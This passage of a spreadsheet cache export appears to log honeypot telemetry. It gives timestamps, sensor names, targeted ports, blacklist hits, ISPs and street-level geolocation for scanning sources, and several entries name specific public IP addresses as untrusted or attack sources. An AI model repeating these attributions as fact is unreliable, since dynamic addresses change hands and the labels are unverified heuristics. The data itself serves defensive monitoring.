&amp;46656&amp;&amp;60932&amp;&amp;65067&amp;&amp;54060&amp;&amp;56678&amp;&amp;42511&amp;&amp;23107&amp;&amp;53366&amp;&amp;30672&amp;&amp;48576&amp;&amp;49865&amp;&amp;64943&amp;&amp;45359&amp;&amp;56356&amp;&amp;57205&amp;&amp;59931&amp;&amp;52183&amp;&amp;50814&amp;&amp;29385&amp;&amp;40451&amp;&amp;47947&amp;&amp;58709&amp;&amp;52734&amp;&amp;59343&amp;&amp;49296&amp;&amp;58623&amp;&amp;42573&amp;&amp;60580&amp;&amp;56765&amp;&amp;63735&amp;&amp;64549&amp;&amp;31982&amp;&amp;59857&amp;&amp;57563&amp;&amp;61928&amp;&amp;60688&amp;&amp;51834&amp;&amp;54199&amp;&amp;57975&amp;&amp;65038&amp;&amp;20998&amp;&amp;60417&amp;&amp;28800&amp;&amp;20871&amp;&amp;38095&amp;&amp;40074&amp;&amp;64865&amp;&amp;50454&amp;&amp;25781&amp;&amp;53836&amp;&amp;27805&amp;&amp;22147&amp;&amp;55064&amp;&amp;30081&amp;&amp;62162&amp;&amp;61688&amp;&amp;38922&amp;&amp;50084&amp;&amp;61884&amp;&amp;61195&amp;&amp;43534&amp;&amp;48084&amp;&amp;57995&amp;&amp;35648&amp;&amp;47863&amp;&amp;60627&amp;&amp;45022&amp;&amp;49454&amp;&amp;63483&amp;&amp;60539&amp;&amp;35058&amp;&amp;56519&amp;&amp;63814&amp;&amp;62247&amp;&amp;54163&amp;&amp;51494&amp;&amp;54742&amp;&amp;59591&amp;&amp;28273&amp;&amp;63600&amp;&amp;49621&amp;&amp;61852&amp;&amp;48737&amp;&amp;44471&amp;&amp;30155&amp;&amp;47358&amp;&amp;54770&amp;&amp;28771&amp;&amp;27748&amp;&amp;37616&amp;&amp;63539&amp;&amp;60256&amp;&amp;23964&amp;&amp;35706&amp;&amp;58400&amp;&amp;36611&amp;&amp;41397&amp;&amp;58594&amp;&amp;60397&amp;&amp;50801&amp;&amp;58286&amp;&amp;50614&amp;&amp;29503&amp;&amp;60679&amp;&amp;51877&amp;&amp;59507&amp;&amp;48015&amp;&amp;45500&amp;&amp;39871&amp;&amp;64018&amp;&amp;56653&amp;&amp;64395&amp;&amp;23037&amp;&amp;59638&amp;&amp;57887&amp;&amp;54322&amp;&amp;34121&amp;&amp;57316&amp;&amp;52854&amp;&amp;63506&amp;&amp;56839&amp;&amp;62421&amp;&amp;28121&amp;&amp;47893&amp;&amp;49694&amp;&amp;43155&amp;&amp;49445&amp;&amp;51099&amp;&amp;48169&amp;&amp;54369&amp;&amp;63711&amp;&amp;32037&amp;&amp;52949&amp;&amp;47433&amp;&amp;57683&amp;&amp;62661&amp;&amp;40625&amp;&amp;57693&amp;&amp;57655&amp;&amp;62390&amp;&amp;54943&amp;&amp;53738&amp;&amp;63692&amp;&amp;58824&amp;&amp;54614&amp;&amp;55289&amp;&amp;52930&amp;&amp;52393&amp;&amp;62703&amp;&amp;65282&amp;&amp;50503&amp;&amp;39314&amp;&amp;44327&amp;&amp;32180&amp;&amp;55939&amp;&amp;44593&amp;&amp;47434&amp;&amp;62889&amp;&amp;35208&amp;&amp;21626&amp;&amp;60295&amp;&amp;63873&amp;&amp;40001&amp;&amp;51797&amp;&amp;57078&amp;&amp;58577&amp;&amp;57389&amp;&amp;41999&amp;&amp;43856&amp;&amp;37502&amp;&amp;47890&amp;&amp;57304&amp;&amp;50802&amp;&amp;61020&amp;&amp;57530&amp;&amp;21348&amp;&amp;55752&amp;&amp;61544&amp;&amp;23790&amp;&amp;27004&amp;&amp;30120&amp;&amp;46251&amp;&amp;42509&amp;&amp;46806&amp;&amp;52971&amp;&amp;37514&amp;&amp;26767&amp;&amp;23271&amp;&amp;31695&amp;&amp;62130&amp;&amp;54822&amp;&amp;38018&amp;&amp;42931&amp;&amp;46186&amp;&amp;54030&amp;&amp;49907&amp;&amp;59190&amp;&amp;61071&amp;&amp;54958&amp;&amp;51509&amp;&amp;49323&amp;&amp;44528&amp;&amp;39498&amp;&amp;50879&amp;&amp;43710&amp;&amp;37597&amp;&amp;62409&amp;&amp;52544&amp;&amp;23216&amp;&amp;31830&amp;&amp;36867&amp;&amp;54285&amp;&amp;50769&amp;&amp;61012&amp;&amp;36273&amp;&amp;51238&amp;&amp;55919&amp;&amp;31463&amp;&amp;28755&amp;&amp;53503&amp;&amp;44648&amp;&amp;51781&amp;&amp;52691&amp;&amp;62346&amp;&amp;51776&amp;&amp;54127&amp;&amp;56265&amp;&amp;57853&amp;&amp;37674&amp;&amp;62795&amp;&amp;53990&amp;&amp;55814&amp;&amp;63765&amp;&amp;52693&amp;&amp;36422&amp;&amp;59410&amp;&amp;54804&amp;&amp;59079&amp;&amp;50807&amp;&amp;65080&amp;&amp;44076&amp;&amp;62624&amp;&amp;47882&amp;&amp;59673&amp;&amp;62077&amp;&amp;29272&amp;&amp;57551&amp;&amp;36513&amp;&amp;61258&amp;&amp;51843&amp;&amp;65268&amp;&amp;49116&amp;&amp;54896&amp;&amp;59112&amp;&amp;65472&amp;&amp;61050&amp;&amp;37034&amp;&amp;60990&amp;&amp;48494&amp;&amp;65147&amp;&amp;55776&amp;&amp;42140&amp;&amp;65208&amp;&amp;61594&amp;&amp;56307&amp;&amp;63864&amp;&amp;21670&amp;&amp;59362&amp;&amp;65179&amp;&amp;54368&amp;&amp;60558&amp;&amp;52141&amp;&amp;60009&amp;&amp;33216&amp;&amp;53992&amp;&amp;58799&amp;&amp;61522&amp;&amp;52899&amp;&amp;63212&amp;&amp;49916&amp;&amp;42372&amp;&amp;28840&amp;&amp;63290&amp;&amp;54506&amp;&amp;63659&amp;&amp;51955&amp;&amp;38298&amp;&amp;59503&amp;&amp;54371&amp;&amp;45177&amp;&amp;62683&amp;&amp;53848&amp;&amp;29848&amp;&amp;53292&amp;&amp;41467&amp;&amp;62579&amp;&amp;53635&amp;&amp;28165&amp;&amp;63518&amp;&amp;54096&amp;&amp;49743&amp;&amp;50964&amp;&amp;25042&amp;&amp;61292&amp;&amp;47725&amp;&amp;61476&amp;&amp;34850&amp;&amp;58113&amp;&amp;49634&amp;&amp;52849&amp;&amp;29882&amp;&amp;64309&amp;&amp;60161&amp;&amp;36920&amp;&amp;23651&amp;&amp;34988&amp;&amp;60261&amp;&amp;56953&amp;&amp;62136&amp;&amp;20911&amp;&amp;57629&amp;&amp;55034&amp;&amp;51489&amp;&amp;50142&amp;&amp;63429&amp;&amp;60340&amp;&amp;65265&amp;&amp;63799&amp;&amp;49892&amp;&amp;53340&amp;&amp;34898&amp;&amp;51327&amp;&amp;61784&amp;&amp;28398&amp;&amp;26676&amp;&amp;52336&amp;&amp;53502&amp;&amp;62972&amp;&amp;58728&amp;&amp;63272&amp;&amp;54743&amp;&amp;63990&amp;&amp;54670&amp;&amp;57149&amp;&amp;29414&amp;&amp;27550&amp;&amp;42074&amp;&amp;20733&amp;&amp;62398&amp;&amp;51088&amp;&amp;57406&amp;&amp;61223&amp;&amp;49198&amp;&amp;32984&amp;&amp;32699&amp;&amp;23845&amp;&amp;48477&amp;&amp;56249&amp;&amp;24792&amp;&amp;56146&amp;&amp;49993&amp;&amp;27473&amp;&amp;21353&amp;&amp;52997&amp;&amp;53628&amp;&amp;52598&amp;&amp;53138&amp;&amp;54996&amp;&amp;36743&amp;&amp;56877&amp;&amp;55830&amp;&amp;24015&amp;&amp;50617&amp;&amp;59511&amp;&amp;44357&amp;&amp;55222&amp;&amp;23635&amp;&amp;53311&amp;&amp;63917&amp;&amp;41377&amp;&amp;61793&amp;&amp;39913&amp;&amp;46555&amp;&amp;43890&amp;&amp;47693&amp;&amp;50056&amp;&amp;45978&amp;&amp;46740&amp;&amp;55213&amp;&amp;25336&amp;&amp;64481&amp;&amp;52247&amp;&amp;63382&amp;&amp;59550&amp;&amp;34492&amp;&amp;38723&amp;&amp;56836&amp;&amp;63887&amp;&amp;46655&amp;&amp;49978&amp;&amp;23769&amp;&amp;35844&amp;&amp;58737&amp;&amp;54983&amp;&amp;52146&amp;&amp;21954&amp;&amp;34432&amp;&amp;21841&amp;&amp;38815&amp;&amp;23868&amp;&amp;60639&amp;&amp;21566&amp;&amp;40566&amp;&amp;46647&amp;&amp;54365&amp;&amp;51424&amp;&amp;59113&amp;&amp;29096&amp;&amp;36546&amp;&amp;51008&amp;&amp;53915&amp;&amp;24657&amp;&amp;33799&amp;&amp;53648&amp;&amp;49224&amp;&amp;63343&amp;&amp;58216&amp;&amp;64261&amp;&amp;63056"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Konkan Division"/>
    <s v="Mumbai (Navpada)"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.1048"/>
    <s v="72.8486"/>
    <s v="138296"/>
    <s v="Juweriyah Networks Private Limited"/>
    <s v="Ankhnet"/>
    <s v="business"/>
    <s v="Ankhnet Informations Pvt. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;stshash"/>
    <s v="{Data_PJL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;NA&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cab3:5c4b"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2330"/>
    <x v="2330"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T16:38:48"/>
    <d v="2025-02-21T17:09:32"/>
    <d v="2025-04-10T16:38:48"/>
    <n v="26"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surendranagar"/>
    <s v="Limbdi"/>
    <s v="1264912"/>
    <s v="NA"/>
    <s v="22.5651"/>
    <s v="71.8108"/>
    <s v="45916"/>
    <s v="Gujarat Telelink Pvt Ltd"/>
    <s v="GTPL Kuttch N/W Pvt. Ltd"/>
    <s v="residential"/>
    <s v="Gtpl Broadband Pvt. Ltd."/>
    <s v="2014-09-01"/>
    <s v="GUJARATKUTCHNETWORK"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2bf2:7553"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2331"/>
    <x v="2331"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T16:30:47"/>
    <d v="2024-04-15T09:28:10"/>
    <d v="2025-04-10T16:30:47"/>
    <n v="30"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;62071&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Rajkot"/>
    <s v="Rajkot (Jagnath Plot)"/>
    <s v="1258847"/>
    <s v="360004"/>
    <s v="22.2934"/>
    <s v="70.7906"/>
    <s v="45117"/>
    <s v="Ishan's Network"/>
    <s v="Ishan Netsol Pvt Ltd"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2014-07-01"/>
    <s v="ISHAN-NETSOL"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (150.242.16.147,57970)}&amp;&amp;{Data_SMB:Incoming connection (150.242.16.147,62110)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (150.242.16.147,62528)}&amp;&amp;{Data_SMB:Incoming connection (150.242.16.147,64048)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:96f2:1093"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2332"/>
    <x v="2332"/>
    <s v="111-248-26-13.dynamic-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-10T16:26:34"/>
    <d v="2025-04-08T06:19:52"/>
    <d v="2025-04-10T16:26:34"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11"/>
    <s v="23"/>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2009-07-23"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6ff8:1a0d"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2333"/>
    <x v="2333"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T16:10:27"/>
    <d v="2023-07-26T07:17:21"/>
    <d v="2025-04-10T16:10:27"/>
    <n v="1931"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_IPP_H16&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_SMB_H22&amp;&amp;SMA-LAB_SSH_H36&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;80&amp;&amp;5900&amp;&amp;389&amp;&amp;631&amp;&amp;443&amp;&amp;445&amp;&amp;22&amp;&amp;40928&amp;&amp;NA&amp;&amp;23&amp;&amp;43678&amp;&amp;19871"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar PJSC"/>
    <s v="residential"/>
    <s v="Kyivstar GSM"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:b290"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2334"/>
    <x v="2334"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T16:03:53"/>
    <d v="2025-04-10T16:03:53"/>
    <d v="2025-04-10T16:03:53"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MP"/>
    <s v="Madhya Pradesh"/>
    <s v="Bhopal"/>
    <s v="Bhopal"/>
    <s v="1275841"/>
    <s v="NA"/>
    <s v="23.2547"/>
    <s v="77.4029"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:3e84"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2335"/>
    <x v="2335"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T15:29:14"/>
    <d v="2024-12-15T01:50:16"/>
    <d v="2025-04-10T15:29:14"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SMB_H12"/>
    <s v="23&amp;&amp;445"/>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2001-12-27"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_SMB:Incoming connection (61.3.47.36,52359)}&amp;&amp;{Data_SMB:Incoming connection (61.3.47.36,52405)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.3.47.36,52946)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:2f24"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2336"/>
    <x v="2336"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T15:16:28"/>
    <d v="2025-04-10T15:16:28"/>
    <d v="2025-04-10T15:16:28"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="26"/>
    <s v="Eskişehir"/>
    <s v="NA"/>
    <s v="Eskişehir"/>
    <s v="315202"/>
    <s v="NA"/>
    <s v="39.7667"/>
    <s v="30.5256"/>
    <s v="16135"/>
    <s v="TURKCELL-AS"/>
    <s v="Turkcell Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b2f2:d356"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2337"/>
    <x v="2337"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T14:58:38"/>
    <d v="2025-04-10T13:49:32"/>
    <d v="2025-04-10T14:58:38"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:3c05"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2338"/>
    <x v="2338"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T14:49:33"/>
    <d v="2025-04-10T14:49:33"/>
    <d v="2025-04-10T14:49:33"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (RajajiNagar)"/>
    <s v="1277333"/>
    <s v="560010"/>
    <s v="13.0123"/>
    <s v="77.5558"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Quadgen WiFi Project C/O Addl GM P3 Bangalore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d02:95f4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2339"/>
    <x v="2339"/>
    <s v="36-225-192-23.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-10T14:38:53"/>
    <d v="2025-04-10T14:38:53"/>
    <d v="2025-04-10T14:38:53"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="HINET"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="corporate"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET: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24e1:c017"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2340"/>
    <x v="2340"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T14:03:59"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-10T14:03:59"/>
    <n v="142"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H31&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;26145&amp;&amp;1433&amp;&amp;3306"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Jasola Vihar)"/>
    <s v="1261481"/>
